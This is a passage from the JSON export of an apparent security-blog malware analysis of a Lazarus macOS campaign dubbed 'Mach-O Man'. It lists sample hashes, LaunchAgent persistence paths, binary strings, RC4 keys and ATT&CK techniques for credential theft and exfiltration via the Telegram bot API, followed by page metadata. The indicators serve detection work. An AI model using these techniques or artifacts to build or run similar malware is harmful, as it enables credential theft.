(D1yCPUyk.bin)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 (D1YrHRTg.bin)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614 (localencode&nbsp;\/ OneDrive)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c (macrasv2)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>cc31b3dc8aeed0af9dd24b7e739f183527d55d5b5ecd3d93ba45dd4aaa8ba260 (MauroDPRKSamples.zip)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b (minst2.bin)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938 (SystemApp.zip)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>dfee6ea9cafc674b93a8460b9e6beea7f0eb0c28e28d1190309347fd1514dbb6 (TeamsApp.zip)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3 (teamsSDK.bin)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9 (ZoomApp.zip)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Host-based IOCs&nbsp;<\/h3>\n\n\n\n<p><strong>Persistence Artifacts<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/LaunchAgents\/com.onedrive.launcher.plist&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/LaunchAgents\/com.onedrive.launcher.tmp&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Suspicious Directories \/ Files<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Library\/.initialized&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>\/Users\/$USER\/.local\/bin\/OneDrive&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>$TMPDIR\/geniex_client_sleep_state&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Code \/ Binary Artifacts&nbsp;<\/h3>\n\n\n\n<p><strong>Strings<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex-client\/core&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex-client\/protocol&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex-client\/Internal\/vss&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex_client_sleep_state&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>geniex&nbsp;config file too short&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>com.onedrive.launcher&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Die command received,&nbsp;initiating&nbsp;self-destruction&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>hobocopy_%d&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Build Artifact<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>GoBuildID:&nbsp;<br>XSnX8a5Y1OweX0Ob6lfO\/ZYlrxu-H_BNvt5ptXb3c\/8HR_X2LwoFzXXN4Fti_K\/xaM13na_g6snvgcy0x9t&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Encryption Keys<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>RC4Key:&nbsp;<br>a73ce18952b40fd621789e43c56b2af08d1497ce3560b2481fa973d8265ce491&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>RC4Key:&nbsp;<br>5476bbf8ddb2fb056295f09ebe05e20a7d1cf29ea279cd4613c87544013e080fef35c97b3511ef9c0f12e505a1d805628ba10483dc9290508f94d153ee94d5c4&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">ATT&amp;CK Matrix&nbsp;<\/h3>\n\n\n\n<p><strong>Execution&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>User Execution (T1204)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Persistence&nbsp;<\/strong><\/p>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>Create or Modify System Process: Launch Agent (T1543.001)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Privilege Escalation&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Abuse Elevation Control Mechanism: Sudo and Sudo Caching (T1548.003)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Defense Evasion&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>File and Directory Permissions Modification (T1222)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Virtualization\/Sandbox Evasion (T1497)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Credential Access<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Credentials from Password Stores (T1555)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Unsecured Credentials (T1552)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Discovery &amp; Collection&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>System Information Discovery (T1082)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Process Discovery (T1057)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>System Time Discovery (T1124)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>File and Directory Discovery (T1083)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Data from Local System (T1005)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Archive Collected Data (T1560)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>Exfiltration&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Exfiltration Over Web Service: Exfiltration to Cloud Storage \/ Web Service (T1567)&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Data is exfiltrated via Telegram bot API, using a legitimate web service to evade detection.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">References&nbsp;<\/h3>\n\n\n\n<p>Original Quetzal Team Article:&nbsp;<a 
href=\"https:\/\/open.substack.com\/pub\/quetzalteam\/p\/north-koreas-safari-hunting-for-rats\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/open.substack.com\/pub\/quetzalteam\/p\/north-koreas-safari-hunting-for-rats<\/a>&nbsp;&nbsp;<\/p>\n\n\n\n<p>Original&nbsp;LevelBlue&nbsp;Labs Intelligence Pulse:&nbsp;https:\/\/otx.alienvault.com\/pulse\/69d9c62d24ae9bc8d5653f56&nbsp;&nbsp;<\/p>\n\n\n\n<p>Session 1:&nbsp;<a href=\"https:\/\/app.any.run\/tasks\/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18<\/a>&nbsp;<\/p>\n\n\n\n<p>Session 2:&nbsp;<a href=\"https:\/\/app.any.run\/tasks\/777b23e8-25ea-45b5-a998-d2e1c400c9d1\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/777b23e8-25ea-45b5-a998-d2e1c400c9d1<\/a>&nbsp;<\/p>\n\n\n\n<p>Session 3:&nbsp;<a href=\"https:\/\/app.any.run\/tasks\/7f771a62-fcda-4a33-8e99-ab068fae8500\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/7f771a62-fcda-4a33-8e99-ab068fae8500<\/a>&nbsp;<\/p>\n\n\n\n<p>Session 4: <a href=\"https:\/\/app.any.run\/tasks\/94b9bc1f-86ff-4069-8222-1cb511d78ad9\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/94b9bc1f-86ff-4069-8222-1cb511d78ad9<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Editor\u2019s note:&nbsp;The research is authored by Mauro Eldritch, offensive security expert and a founder of BCA LTD, a company dedicated to threat intelligence and hunting. You can&nbsp;find Mauro on X.&nbsp; The recent wave of&nbsp;ClickFix attacks&nbsp;has introduced several new ways to compromise users,&nbsp;establishing&nbsp;itself as a technique that is likely here to stay. 
We have&nbsp;observed&nbsp;Lazarus Group using [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":20237,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,10,34,40],"class_list":["post-20176","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-cybersecurity","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Lazarus \u201cMach-O Man\u201d Malware: What CISOs Need to Know<\/title>\n<meta name=\"description\" content=\"Learn how the Lazarus \u201cMach-O Man\u201d campaign targets businesses, and how SOC leaders can reduce credential theft and data exposure risk.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mauro Eldritch\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"16 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\"},\"author\":{\"name\":\"Mauro Eldritch\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses\",\"datePublished\":\"2026-04-21T08:49:42+00:00\",\"dateModified\":\"2026-04-21T11:02:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\"},\"wordCount\":3645,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"cybersecurity\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\",\"name\":\"Lazarus \u201cMach-O Man\u201d Malware: What CISOs Need to Know\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2026-04-21T08:49:42+00:00\",\"dateModified\":\"2026-04-21T11:02:52+00:00\",\"description\":\"Learn how the Lazarus \u201cMach-O Man\u201d campaign targets businesses, and how SOC leaders can reduce credential theft and data exposure 
risk.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required 
name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"Mauro Eldritch\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg\",\"caption\":\"Mauro Eldritch\"},\"description\":\"Mauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina \/ Uruguay). He has spoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and Biohacking.\u00a0He currently leads Bitso\u2019s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research. Follow Mauro on: X LinkedIn GitHub\",\"url\":\"#molongui-disabled-link\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Lazarus \u201cMach-O Man\u201d Malware: What CISOs Need to Know","description":"Learn how the Lazarus \u201cMach-O Man\u201d campaign targets businesses, and how SOC leaders can reduce credential theft and data exposure risk.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/","twitter_misc":{"Written by":"Mauro Eldritch","Est. reading time":"16 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/"},"author":{"name":"Mauro Eldritch","@id":"https:\/\/any.run\/"},"headline":"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses","datePublished":"2026-04-21T08:49:42+00:00","dateModified":"2026-04-21T11:02:52+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/"},"wordCount":3645,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","cybersecurity","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/","url":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/","name":"Lazarus \u201cMach-O Man\u201d Malware: What CISOs Need to Know","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2026-04-21T08:49:42+00:00","dateModified":"2026-04-21T11:02:52+00:00","description":"Learn how the Lazarus 
\u201cMach-O Man\u201d campaign targets businesses, and how SOC leaders can reduce credential theft and data exposure risk.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required 
name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"Mauro Eldritch","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg","caption":"Mauro Eldritch"},"description":"Mauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina \/ Uruguay). He has spoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and Biohacking.\u00a0He currently leads Bitso\u2019s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research. 
Follow Mauro on: X LinkedIn GitHub","url":"#molongui-disabled-link"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/20176"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=20176"}],"version-history":[{"count":45,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/20176\/revisions"}],"predecessor-version":[{"id":20270,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/20176\/revisions\/20270"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/20237"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=20176"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=20176"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=20176"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}